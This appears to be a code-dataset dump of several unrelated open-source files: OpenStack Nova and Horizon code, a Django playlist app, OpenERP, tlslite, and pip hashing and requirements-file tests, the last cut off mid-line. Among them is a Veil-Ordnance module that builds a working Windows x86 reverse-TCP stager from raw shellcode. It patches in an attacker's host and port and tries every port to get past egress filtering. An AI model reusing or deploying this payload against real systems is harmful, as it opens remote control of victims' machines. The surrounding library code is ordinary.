nova.network.neutronv2 import api as neutron_api _IS_NEUTRON = issubclass(importutils.import_class(cls_name), neutron_api.API) except ImportError: _IS_NEUTRON = False return _IS_NEUTRON def reset_is_neutron(): global _IS_NEUTRON_ATTEMPTED global _IS_NEUTRON _IS_NEUTRON_ATTEMPTED = False _IS_NEUTRON = False def is_auto_disk_config_disabled(auto_disk_config_raw): auto_disk_config_disabled = False if auto_disk_config_raw is not None: adc_lowered = auto_disk_config_raw.strip().lower() if adc_lowered == "disabled": auto_disk_config_disabled = True return auto_disk_config_disabled def get_auto_disk_config_from_instance(instance=None, sys_meta=None): if sys_meta is None: sys_meta = instance_sys_meta(instance) return sys_meta.get("image_auto_disk_config") def get_auto_disk_config_from_image_props(image_properties): return image_properties.get("auto_disk_config") def get_system_metadata_from_image(image_meta, flavor=None): system_meta = {} prefix_format = SM_IMAGE_PROP_PREFIX + '%s' for key, value in image_meta.get('properties', {}).iteritems(): new_value = unicode(value)[:255] system_meta[prefix_format % key] = new_value for key in SM_INHERITABLE_KEYS: value = image_meta.get(key) if key == 'min_disk' and flavor: if image_meta.get('disk_format') == 'vhd': value = flavor['root_gb'] else: value = max(value, flavor['root_gb']) if value is None: continue system_meta[prefix_format % key] = value return system_meta def get_image_from_system_metadata(system_meta): image_meta = {} properties = {} if not isinstance(system_meta, dict): system_meta = metadata_to_dict(system_meta) for key, value in system_meta.iteritems(): if value is None: continue # NOTE(xqueralt): Not sure this has to inherit all the properties or # just the ones we need. Leaving it for now to keep the old behaviour. if key.startswith(SM_IMAGE_PROP_PREFIX): key = key[len(SM_IMAGE_PROP_PREFIX):] if key in SM_INHERITABLE_KEYS: image_meta[key] = value else: # Skip properties that are non-inheritable if key in CONF.non_inheritable_image_properties: continue properties[key] = value if properties: image_meta['properties'] = properties return image_meta def get_hash_str(base_str): """returns string that represents hash of base_str (in hex format).""" return hashlib.md5(base_str).hexdigest()
apache-2.0
robforsythe/tune
tune/views.py
1
10964
from tune.models import User, Playlist, Artist, Album, Track, PlaylistSong from django.shortcuts import redirect, render, get_object_or_404 from django.contrib.auth import authenticate, login, logout from django.core.cache import cache from json import loads, dumps from urllib2 import urlopen # TODO @login_required decorator for: # new, create, update, delete, search, detail # We layer cache accesses over most db accesses and requests; cache is # always checked first for a quicker alternative (!!) # select_related: retrieves related FK tables via a single complex query, # so later use of FK relationships don't require extra queries # downside: too much information can potentially be retrieved # rule of thumb: use for joining one-to-one relationships via FK ## Homepage function ## def index(request): ''' index - displays all created playlists ''' # check cache; if not there, hit db. DON'T set cache here. # commented out because stale values are prevented # playlists = cache.get("Playlists") # if not playlists: # playlists = Playlist.objects.select_related().all() playlists = Playlist.objects.select_related().all() context = { 'playlists': playlists } return render(request, 'tune/index.html', context) ## User functions ## def userLogin(request): ''' render login page if not already logged in, else redirect to index ''' if not request.user.is_authenticated(): return render(request, 'tune/login.html') else: return render(request, 'tune/index.html') def userLogout(request): ''' logout, redirect to index ''' logout(request) return redirect('index') def validateUser(request): ''' validates User creds, or create a new User if nonexistent username ''' uname, pword = request.POST['username'], request.POST['password'] # try and retrieve existing User try: user = cache.get(uname) if not user: user = User.objects.get(username=uname) cache.set(uname, user) user = authenticate(username=uname, password=pword) # password verified if user is not None: login(request, user) else: return render(request, 'tune/err.html', { 'pass': True }) # user doesn't exist except User.DoesNotExist: User.objects.create_user(username=uname, password=pword) user = authenticate(username=uname, password=pword) login(request, user) cache.set(uname, user) return redirect('index') ## Search functions ## def search(request): ''' return results of a query made to the spotify API ''' # if user isn't authenticated, render login page if not request.user.is_authenticated(): return render(request, 'tune/login.html') if request.GET['query']: query = request.GET['query'].encode('utf-8').replace(' ', '%20') url = 'http://ws.spotify.com/search/1/{}.json?q={}' # check if search has been performed recently results = cache.get(query) # if the request isn't in the cache, perform query if not results: results = { } for queryType in ['album', 'artist', 'track']: prl = url.format(queryType, query) searchResults = loads(urlopen(prl).read())["{}s".format(queryType)] results[queryType] = searchResults # add to cache after the request cache.set(query, results) # add this user's playlists to the cache plists = cache.get("{}Playlists".format(request.user.username)) if not plists: plists = Playlist.objects.select_related().filter(author=request.user) cache.set("{}Playlists".format(request.user.username), plists) context = { 'form': True, 'results': results, 'playlists': plists, 'json': dumps(results), 'query': request.GET['query'] } return render(request, 'tune/search.html', context) else: return render(request, 'tune/err.html', { 'emptyQuery': True }) def detail(request, href): ''' return in-depth search results ''' queryType = href.split(':')[1] if queryType == 'artist': url = 'http://ws.spotify.com/lookup/1/.json?uri={}&extras=album' else: url = 'http://ws.spotify.com/lookup/1/.json?uri={}&extras=trackdetail' url = url.format(href) searchResults = cache.get(url) if not searchResults: searchResults = loads(urlopen(url).read()) cache.set(url, searchResults) # context common to both searches context = { 'href': href, 'detail': True, 'queryType': queryType, 'results': searchResults[queryType], 'name': searchResults[queryType]['name'] } # missing if queryType == 'album': context['form'] = True plists = cache.get("{}Playlists".format(request.user.username)) if not plists: plists = Playlist.objects.select_related().filter(author=request.user) context['playlists'] = plists context['json'] = dumps(searchResults[queryType]) return render(request, 'tune/search.html', context) ## PlaylistSong manipulation functions ## # addTrack helper method def getTrackInfo(queryType, args): data = cache.get(args['href']) if not data: if queryType == 'artist': try: data = Artist.objects.get(**args) except Artist.DoesNotExist: data = Artist(**args) data.save() elif queryType == 'album': try: data = Album.objects.get(**args) except Album.DoesNotExist: data = Album(**args) data.save() elif queryType == 'track': try: data = Track.objects.get(**args) except Track.DoesNotExist: data = Track(**args) data.save() cache.set(args['href'], data) return data def addTracks(request): ''' add track(s) to playlist(s) ''' # default value format: # [ # TrackName::TrackLength::ArtistName::AlbumName:: # AlbumHREF::TrackHREF::ArtistHREF::PlaylistID # ] # 3 bulk creates should add all to db; problem is duplicates # TODO would a raw SQL query be faster? (e.g. INSERT IGNORE INTO ...) for track in request.POST: if track != 'csrfmiddlewaretoken': data = request.POST[track].split('::') # try and get artist/album/track href from cache # if not in cache, hit the database; if not in db, create # afterwards, add new playlist-song relationship to db a = getTrackInfo('artist', { 'href': data[6], 'name': data[2] }) b = getTrackInfo('album', { 'href': data[4], 'name': data[3], 'artist': a }) c = getTrackInfo('track', { 'href': data[5], 'name': data[0], 'length': data[1], 'artist': a, 'album': b }) # add track to the PlaylistSong model p = cache.get("Playlist{}".format(data[7])) if not p: p = Playlist.objects.get(pk=int(data[7])) cache.set("Playlist{}".format(data[7]), p) # TODO store this value in cache? PlaylistSong.objects.create(playlist=p, track=c) return redirect('index') ## CRUD functions ## def new(request): ''' route to the playlist creation page ''' if request.user.is_authenticated(): return render(request, 'tune/form.html') else: return render(request, 'tune/err.html') def create(request): ''' create/edit a playlist, redirect to 'show' page after completion ''' # convert to dict to properly retrieve list data myDict = dict(request.POST.iterlists()) currID = request.POST.get('currID', None) # if updating, check cache and db; otherwise, create a new playlist if currID: playlist = cache.get("Playlist{}".format(request.POST['currID'])) if not playlist: playlist = Playlist.objects.get(pk=currID) playlist.name = request.POST['pName'] else: playlist = Playlist(name=request.POST['pName'], author=request.user) playlist.save() # set a new value for "Playlists" in the cache because we added one # cache.set("Playlists", Playlist.objects.select_related().all()) cache.set("Playlist{}".format(playlist.pk), playlist) # sample POST data: # # 'deleted': [ # u'spotify:track:7u5dBtASrtOuBTTZjJrvuJ', # u'spotify:track:07q6QTQXyPRCf7GbLakRPr', # u'spotify:track:7u5dBtASrtOuBTTZjJrvuJ' # (duplicate) # ] deleted = request.POST.get('deleted', None) # p = list of playlist-song relationships for this playlist if deleted: p = cache.get(playlist.pk) if not p: p = PlaylistSong.objects.select_related('track').filter( playlist=playlist) cache.set("PS{}".format(playlist.pk), p) # for each relationship: if href matches, then delete the record # then, break in order to avoid the duplicate case # (deleting multiple copies of the same track in a playlist) for href in myDict['deleted']: for link in p: if link.track.href == href: link.delete() break return redirect('show', playlist.pk) def show(request, pID): ''' display a playlist and the songs it contains ''' playlist = get_object_or_404(Playlist, pk=pID) # get all PlaylistSong objects associated with this playlist # e.g. [<p1, 'song1'>, <p1, 'song3'>, ... ] tracks = cache.get(playlist.pk) if not tracks: tracks = PlaylistSong.objects.select_related().filter(playlist=playlist) cache.set("PS{}".format(playlist.pk), tracks) context = { 'name': playlist.name, 'author': playlist.author, 'tracks': tracks } return render(request, 'tune/show.html', context) def update(request, pID): ''' send context to form and allow user to update properties ''' playlist = get_object_or_404(Playlist, pk=pID) if request.user.is_authenticated(): if playlist.author.username != request.user.username: return render(request, 'tune/err.html', { 'noAccess': True }) tracks = cache.get("PS{}".format(playlist.pk)) if not tracks: tracks = PlaylistSong.objects.select_related().filter(playlist=playlist) cache.set("PS{}".format(playlist.pk), tracks) # get existing playlist information context = { 'existing': True, 'name': playlist.name, 'author': playlist.author, 'currID': playlist.pk, 'tracks': tracks } return render(request, 'tune/form.html', context) else: return render(request, 'tune/err.html') def delete(request, pID): ''' delete playlist and redirect to index page ''' if request.user.is_authenticated(): playlist = Playlist.objects.get(pk=pID) if playlist.author.username != request.user.username: return render(request, 'tune/err.html', { 'noAccess': True }) else: cache.delete("Playlist{}".format(playlist.pk)) playlist.delete() return redirect('index') else: return render(request, 'tune/err.html')
mit
aricchen/openHR
openerp/addons/account_report_company/account_report_company.py
7
2316
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Business Applications # Copyright (c) 2013 S.A. <http://openerp.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import osv, fields class res_partner(osv.Model): _inherit = 'res.partner' _order = 'display_name' def _display_name_compute(self, cr, uid, ids, name, args, context=None): return dict(self.name_get(cr, uid, ids, context=context)) _display_name_store_triggers = { 'res.partner': (lambda self,cr,uid,ids,context=None: self.search(cr, uid, [('id','child_of',ids)]), ['parent_id', 'is_company', 'name'], 10) } # indirection to avoid passing a copy of the overridable method when declaring the function field _display_name = lambda self, *args, **kwargs: self._display_name_compute(*args, **kwargs) _columns = { # extra field to allow ORDER BY to match visible names 'display_name': fields.function(_display_name, type='char', string='Name', store=_display_name_store_triggers), } class account_invoice(osv.Model): _inherit = 'account.invoice' _columns = { 'commercial_partner_id': fields.related('partner_id', 'commercial_partner_id', string='Commercial Entity', type='many2one', relation='res.partner', store=True, readonly=True, help="The commercial entity that will be used on Journal Entries for this invoice") }
agpl-3.0
Exploit-install/Veil-Ordnance
payloads/x86/rev_tcp_all_ports.py
3
5899
# This is the reverse_tcp payload, completely ported from the Metasploit # Framework. # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/reverse_tcp.rb import binascii import re import socket import sys class RevTCPAP: def __init__(self): self.name = "Reverse TCP All Ports Stager (Stage 1)" self.description = "Attempts to egress bust by trying all ports!" self.platform = "Windows" self.arch = "x86" self.lport = 4444 self.lhost = None self.retries_offset = 192 self.lhost_offset = 195 self.lport_offset = 202 self.exitfunc_offset = 226 self.exit_func = '\xf0\xb5\xa2\x56' self.customized_shellcode = '' self.stager = ( "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" + "\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" + "\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" + "\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" + "\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" + "\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" + "\xC6\x85\xF6\x75\xEC\xC3") def set_attrs(self, lport_value, lhost_value): self.lport = lport_value # Check if given a domain or IP address: if self.validate_ip(lhost_value): self.lhost = lhost_value else: try: self.lhost = socket.gethostbyname(lhost_value) except socket.gaierror: print "[*] Error: Invalid domain or IP provided for LHOST value!" print "[*] Error: Please re-run with the correct value." sys.exit() return def gen_shellcode(self): # Take the passed in attributes and gen shellcode ip_shellcode = '' n = 2 ip_shellcode_stage = binascii.hexlify(socket.inet_aton(self.lhost)) ip_shellcode_stage = [ip_shellcode_stage[i:i+n] for i in range(0, len(ip_shellcode_stage), n)] for two_bytes in ip_shellcode_stage: ip_shellcode += '\\x' + two_bytes # convert port to shellcode port_shellcode_stage = str(hex(self.lport).lstrip('0')) if len(port_shellcode_stage.lstrip('x')) == 3: # detect if odd number, is so, need to add a '0' to the front port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') port_1half = '\\x' + port_1half port_2half = port_shellcode_stage[2:4] port_2half = '\\x' + port_2half port_shellcode = port_1half + port_2half elif len(port_shellcode_stage.lstrip('x')) == 4: port_1half = port_shellcode_stage[1:3] port_1half = '\\x' + port_1half port_2half = port_shellcode_stage[3:5] port_2half = '\\x' + port_2half port_shellcode = port_1half + port_2half elif len(port_shellcode_stage.lstrip('x')) == 2: port_1half = port_shellcode_stage[1:3].lstrip('x') port_1half = '\\x' + port_1half port_2half = '00' port_2half = '\\x' + port_2half port_shellcode = port_2half + port_1half elif len(port_shellcode_stage.lstrip('x')) == 1: port_1half = port_shellcode_stage.lstrip('x') port_1half = '\\x0' + port_1half port_2half = '\\x00' port_shellcode = port_2half + port_1half stager_shellcode = self.stager[0:self.lhost_offset] stager_shellcode += ip_shellcode.decode('string-escape') stager_shellcode += self.stager[self.lhost_offset + 4:self.lport_offset] stager_shellcode += port_shellcode.decode('string-escape') stager_shellcode += self.stager[self.lport_offset + 2:] self.customized_shellcode = "\\x" + '\\x'.join(stager_shellcode.encode('hex')[i:i+2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) return def print_shellcode(self): print self.customized_shellcode return def payload_stats(self, cli_info): print "Payload Name: " + self.name print "IP Address: " + cli_info.ip print "Port: " + str(cli_info.port) print "Shellcode Size: " + str(len(self.customized_shellcode.decode('string-escape'))) + '\n' return def validate_ip(self, val_ip): # This came from (Mult-line link for pep8 compliance) # http://python-iptools.googlecode.com/svn-history/r4 # /trunk/iptools/__init__.py ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$') if ip_re.match(val_ip): quads = (int(q) for q in val_ip.split('.')) for q in quads: if q > 255: return False return True return False
gpl-3.0
spandanb/horizon
openstack_dashboard/dashboards/project/routers/extensions/routerrules/tables.py
1
2774
# Copyright 2013, Big Switch Networks, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from django.utils.translation import ugettext_lazy as _ from openstack_dashboard.dashboards.project.routers.extensions.routerrules\ import rulemanager from horizon import tables LOG = logging.getLogger(__name__) class AddRouterRule(tables.LinkAction): name = "create" verbose_name = _("Add Router Rule") url = "horizon:project:routers:addrouterrule" classes = ("ajax-modal", "btn-create") policy_rules = (("network", "update_router"),) def get_policy_target(self, request, datum=None): project_id = None if datum: project_id = getattr(datum, 'tenant_id', None) return {"project_id": project_id} def get_link_url(self, datum=None): router_id = self.table.kwargs['router_id'] return reverse(self.url, args=(router_id,)) class RemoveRouterRule(tables.DeleteAction): data_type_singular = _("Router Rule") data_type_plural = _("Router Rules") failure_url = 'horizon:project:routers:detail' policy_rules = (("network", "update_router"),) def get_policy_target(self, request, datum=None): project_id = None if datum: project_id = getattr(datum, 'tenant_id', None) return {"project_id": project_id} def delete(self, request, obj_id): router_id = self.table.kwargs['router_id'] rulemanager.remove_rules(request, [obj_id], router_id=router_id) class RouterRulesTable(tables.DataTable): source = tables.Column("source", verbose_name=_("Source CIDR")) destination = tables.Column("destination", verbose_name=_("Destination CIDR")) action = tables.Column("action", verbose_name=_("Action")) nexthops = tables.Column("nexthops", verbose_name=_("Next Hops")) def get_object_display(self, rule): return "(%(action)s) %(source)s -> %(destination)s" % rule class Meta: name = "routerrules" verbose_name = _("Router Rules") table_actions = (AddRouterRule, RemoveRouterRule) row_actions = (RemoveRouterRule, )
apache-2.0
aospx-kitkat/platform_external_chromium_org
third_party/tlslite/tlslite/Checker.py
359
6301
"""Class for post-handshake certificate checking.""" from utils.cryptomath import hashAndBase64 from X509 import X509 from X509CertChain import X509CertChain from errors import * class Checker: """This class is passed to a handshake function to check the other party's certificate chain. If a handshake function completes successfully, but the Checker judges the other party's certificate chain to be missing or inadequate, a subclass of L{tlslite.errors.TLSAuthenticationError} will be raised. Currently, the Checker can check either an X.509 or a cryptoID chain (for the latter, cryptoIDlib must be installed). """ def __init__(self, cryptoID=None, protocol=None, x509Fingerprint=None, x509TrustList=None, x509CommonName=None, checkResumedSession=False): """Create a new Checker instance. You must pass in one of these argument combinations: - cryptoID[, protocol] (requires cryptoIDlib) - x509Fingerprint - x509TrustList[, x509CommonName] (requires cryptlib_py) @type cryptoID: str @param cryptoID: A cryptoID which the other party's certificate chain must match. The cryptoIDlib module must be installed. Mutually exclusive with all of the 'x509...' arguments. @type protocol: str @param protocol: A cryptoID protocol URI which the other party's certificate chain must match. Requires the 'cryptoID' argument. @type x509Fingerprint: str @param x509Fingerprint: A hex-encoded X.509 end-entity fingerprint which the other party's end-entity certificate must match. Mutually exclusive with the 'cryptoID' and 'x509TrustList' arguments. @type x509TrustList: list of L{tlslite.X509.X509} @param x509TrustList: A list of trusted root certificates. The other party must present a certificate chain which extends to one of these root certificates. The cryptlib_py module must be installed. Mutually exclusive with the 'cryptoID' and 'x509Fingerprint' arguments. @type x509CommonName: str @param x509CommonName: The end-entity certificate's 'CN' field must match this value. For a web server, this is typically a server name such as 'www.amazon.com'. Mutually exclusive with the 'cryptoID' and 'x509Fingerprint' arguments. Requires the 'x509TrustList' argument. @type checkResumedSession: bool @param checkResumedSession: If resumed sessions should be checked. This defaults to False, on the theory that if the session was checked once, we don't need to bother re-checking it. """ if cryptoID and (x509Fingerprint or x509TrustList): raise ValueError() if x509Fingerprint and x509TrustList: raise ValueError() if x509CommonName and not x509TrustList: raise ValueError() if protocol and not cryptoID: raise ValueError() if cryptoID: import cryptoIDlib #So we raise an error here if x509TrustList: import cryptlib_py #So we raise an error here self.cryptoID = cryptoID self.protocol = protocol self.x509Fingerprint = x509Fingerprint self.x509TrustList = x509TrustList self.x509CommonName = x509CommonName self.checkResumedSession = checkResumedSession def __call__(self, connection): """Check a TLSConnection. When a Checker is passed to a handshake function, this will be called at the end of the function. @type connection: L{tlslite.TLSConnection.TLSConnection} @param connection: The TLSConnection to examine. @raise tlslite.errors.TLSAuthenticationError: If the other party's certificate chain is missing or bad. """ if not self.checkResumedSession and connection.resumed: return if self.cryptoID or self.x509Fingerprint or self.x509TrustList: if connection._client: chain = connection.session.serverCertChain else: chain = connection.session.clientCertChain if self.x509Fingerprint or self.x509TrustList: if isinstance(chain, X509CertChain): if self.x509Fingerprint: if chain.getFingerprint() != self.x509Fingerprint: raise TLSFingerprintError(\ "X.509 fingerprint mismatch: %s, %s" % \ (chain.getFingerprint(), self.x509Fingerprint)) else: #self.x509TrustList if not chain.validate(self.x509TrustList): raise TLSValidationError("X.509 validation failure") if self.x509CommonName and \ (chain.getCommonName() != self.x509CommonName): raise TLSAuthorizationError(\ "X.509 Common Name mismatch: %s, %s" % \ (chain.getCommonName(), self.x509CommonName)) elif chain: raise TLSAuthenticationTypeError() else: raise TLSNoAuthenticationError() elif self.cryptoID: import cryptoIDlib.CertChain if isinstance(chain, cryptoIDlib.CertChain.CertChain): if chain.cryptoID != self.cryptoID: raise TLSFingerprintError(\ "cryptoID mismatch: %s, %s" % \ (chain.cryptoID, self.cryptoID)) if self.protocol: if not chain.checkProtocol(self.protocol): raise TLSAuthorizationError(\ "cryptoID protocol mismatch") if not chain.validate(): raise TLSValidationError("cryptoID validation failure") elif chain: raise TLSAuthenticationTypeError() else: raise TLSNoAuthenticationError()
bsd-3-clause
dessHub/bc-14-online-store-application
flask/lib/python2.7/site-packages/pip/utils/hashes.py
517
2866
from __future__ import absolute_import import hashlib from pip.exceptions import HashMismatch, HashMissing, InstallationError from pip.utils import read_chunks from pip._vendor.six import iteritems, iterkeys, itervalues # The recommended hash algo of the moment. Change this whenever the state of # the art changes; it won't hurt backward compatibility. FAVORITE_HASH = 'sha256' # Names of hashlib algorithms allowed by the --hash option and ``pip hash`` # Currently, those are the ones at least as collision-resistant as sha256. STRONG_HASHES = ['sha256', 'sha384', 'sha512'] class Hashes(object): """A wrapper that builds multiple hashes at once and checks them against known-good values """ def __init__(self, hashes=None): """ :param hashes: A dict of algorithm names pointing to lists of allowed hex digests """ self._allowed = {} if hashes is None else hashes def check_against_chunks(self, chunks): """Check good hashes against ones built from iterable of chunks of data. Raise HashMismatch if none match. """ gots = {} for hash_name in iterkeys(self._allowed): try: gots[hash_name] = hashlib.new(hash_name) except (ValueError, TypeError): raise InstallationError('Unknown hash name: %s' % hash_name) for chunk in chunks: for hash in itervalues(gots): hash.update(chunk) for hash_name, got in iteritems(gots): if got.hexdigest() in self._allowed[hash_name]: return self._raise(gots) def _raise(self, gots): raise HashMismatch(self._allowed, gots) def check_against_file(self, file): """Check good hashes against a file-like object Raise HashMismatch if none match. """ return self.check_against_chunks(read_chunks(file)) def check_against_path(self, path): with open(path, 'rb') as file: return self.check_against_file(file) def __nonzero__(self): """Return whether I know any known-good hashes.""" return bool(self._allowed) def __bool__(self): return self.__nonzero__() class MissingHashes(Hashes): """A workalike for Hashes used when we're missing a hash for a requirement It computes the actual hash of the requirement and raises a HashMissing exception showing it to the user. """ def __init__(self): """Don't offer the ``hashes`` kwarg.""" # Pass our favorite hash in to generate a "gotten hash". With the # empty list, it will never match, so an error will always raise. super(MissingHashes, self).__init__(hashes={FAVORITE_HASH: []}) def _raise(self, gots): raise HashMissing(gots[FAVORITE_HASH].hexdigest())
gpl-3.0
benesch/pip
tests/unit/test_req_file.py
6
22259
import os import subprocess import textwrap from mock import patch, Mock import pytest from pretend import stub import pip from pip.exceptions import (InstallationError, RequirementsFileParseError) from pip.download import PipSession from pip.index import PackageFinder from pip.req.req_install import InstallRequirement from pip.req.req_file import (parse_requirements, process_line, join_lines, ignore_comments, break_args_options, skip_regex, preprocess) from tests.lib import requirements_file @pytest.fixture def session(): return PipSession() @pytest.fixture def finder(session): return PackageFinder([], [], session=session) @pytest.fixture def options(session): return stub( isolated_mode=False, default_vcs=None, index_url='default_url', skip_requirements_regex=False, format_control=pip.index.FormatControl(set(), set())) class TestPreprocess(object): """tests for `preprocess`""" def test_comments_and_joins_case1(self): content = textwrap.dedent("""\ req1 \\ # comment \\ req2 """) result = preprocess(content, None) assert list(result) == [(1, 'req1'), (3, 'req2')] def test_comments_and_joins_case2(self): content = textwrap.dedent("""\ req1\\ # comment """) result = preprocess(content, None) assert list(result) == [(1, 'req1')] def test_comments_and_joins_case3(self): content = textwrap.dedent("""\ req1 \\ # comment req2 """) result = preprocess(content, None) assert list(result) == [(1, 'req1'), (3, 'req2')] def test_skip_regex_after_joining_case1(self, options): content = textwrap.dedent("""\ patt\\ ern line2 """) options.skip_requirements_regex = 'pattern' result = preprocess(content, options) assert list(result) == [(3, 'line2')] def test_skip_regex_after_joining_case2(self, options): content = textwrap.dedent("""\ pattern \\ line2 line3 """) options.skip_requirements_regex = 'pattern' result = preprocess(content, options) assert list(result) == [(3, 'line3')] class TestIgnoreComments(object): """tests for `ignore_comment`""" def test_ignore_line(self): lines = [(1, ''), (2, 'req1'), (3, 'req2')] result = ignore_comments(lines) assert list(result) == [(2, 'req1'), (3, 'req2')] def test_ignore_comment(self): lines = [(1, 'req1'), (2, '# comment'), (3, 'req2')] result = ignore_comments(lines) assert list(result) == [(1, 'req1'), (3, 'req2')] def test_strip_comment(self): lines = [(1, 'req1'), (2, 'req # comment'), (3, 'req2')] result = ignore_comments(lines) assert list(result) == [(1, 'req1'), (2, 'req'), (3, 'req2')] class TestJoinLines(object): """tests for `join_lines`""" def test_join_lines(self): lines = enumerate([ 'line 1', 'line 2:1 \\', 'line 2:2', 'line 3:1 \\', 'line 3:2 \\', 'line 3:3', 'line 4' ], start=1) expect = [ (1, 'line 1'), (2, 'line 2:1 line 2:2'), (4, 'line 3:1 line 3:2 line 3:3'), (7, 'line 4'), ] assert expect == list(join_lines(lines)) def test_last_line_with_escape(self): lines = enumerate([ 'line 1', 'line 2 \\', ], start=1) expect = [ (1, 'line 1'), (2, 'line 2 '), ] assert expect == list(join_lines(lines)) class TestSkipRegex(object): """tests for `skip_reqex``""" def test_skip_regex_pattern_match(self): options = stub(skip_requirements_regex='.*Bad.*') line = '--extra-index-url Bad' assert [] == list(skip_regex(enumerate([line]), options)) def test_skip_regex_pattern_not_match(self): options = stub(skip_requirements_regex='.*Bad.*') line = '--extra-index-url Good' assert [(0, line)] == list(skip_regex(enumerate([line]), options)) def test_skip_regex_no_options(self): options = None line = '--extra-index-url Good' assert [(0, line)] == list(skip_regex(enumerate([line]), options)) def test_skip_regex_no_skip_option(self): options = stub(skip_requirements_regex=None) line = '--extra-index-url Good' assert [(0, line)] == list(skip_regex(enumerate([line]), options)) class TestProcessLine(object): """tests for `process_line`""" def test_parser_error(self): with pytest.raises(RequirementsFileParseError): list(process_line("--bogus", "file", 1)) def test_only_one_req_per_line(self): # pkg_resources raises the ValueError with pytest.raises(InstallationError): list(process_line("req1 req2", "file", 1)) def test_yield_line_requirement(self): line = 'SomeProject' filename = 'filename' comes_from = '-r %s (line %s)' % (filename, 1) req = InstallRequirement.from_line(line, comes_from=comes_from) assert repr(list(process_line(line, filename, 1))[0]) == repr(req) def test_yield_line_constraint(self): line = 'SomeProject' filename = 'filename' comes_from = '-c %s (line %s)' % (filename, 1) req = InstallRequirement.from_line( line, comes_from=comes_from, constraint=True) found_req = list(process_line(line, filename, 1, constraint=True))[0] assert repr(found_req) == repr(req) assert found_req.constraint is True def test_yield_line_requirement_with_spaces_in_specifier(self): line = 'SomeProject >= 2' filename = 'filename' comes_from = '-r %s (line %s)' % (filename, 1) req = InstallRequirement.from_line(line, comes_from=comes_from) assert repr(list(process_line(line, filename, 1))[0]) == repr(req) assert str(req.req.specifier) == '>=2' def test_yield_editable_requirement(self): url = 'git+https://url#egg=SomeProject' line = '-e %s' % url filename = 'filename' comes_from = '-r %s (line %s)' % (filename, 1) req = InstallRequirement.from_editable(url, comes_from=comes_from) assert repr(list(process_line(line, filename, 1))[0]) == repr(req) def test_yield_editable_constraint(self): url = 'git+https://url#egg=SomeProject' line = '-e %s' % url filename = 'filename' comes_from = '-c %s (line %s)' % (filename, 1) req = InstallRequirement.from_editable( url, comes_from=comes_from, constraint=True) found_req = list(process_line(line, filename, 1, constraint=True))[0] assert repr(found_req) == repr(req) assert found_req.constraint is True def test_nested_requirements_file(self, monkeypatch): line = '-r another_file' req = InstallRequirement.from_line('SomeProject') import pip.req.req_file def stub_parse_requirements(req_url, finder, comes_from, options, session, wheel_cache, constraint): return [(req, constraint)] parse_requirements_stub = stub(call=stub_parse_requirements) monkeypatch.setattr(pip.req.req_file, 'parse_requirements', parse_requirements_stub.call) assert list(process_line(line, 'filename', 1)) == [(req, False)] def test_nested_constraints_file(self, monkeypatch): line = '-c another_file' req = InstallRequirement.from_line('SomeProject') import pip.req.req_file def stub_parse_requirements(req_url, finder, comes_from, options, session, wheel_cache, constraint): return [(req, constraint)] parse_requirements_stub = stub(call=stub_parse_requirements) monkeypatch.setattr(pip.req.req_file, 'parse_requirements', parse_requirements_stub.call) assert list(process_line(line, 'filename', 1)) == [(req, True)] def test_options_on_a_requirement_line(self): line = 'SomeProject --install-option=yo1 --install-option yo2 '\ '--global-option="yo3" --global-option "yo4"' filename = 'filename' req = list(process_line(line, filename, 1))[0] assert req.options == { 'global_options': ['yo3', 'yo4'], 'install_options': ['yo1', 'yo2']} def test_hash_options(self): """Test the --hash option: mostly its value storage. Make sure it reads and preserve multiple hashes. """ line = 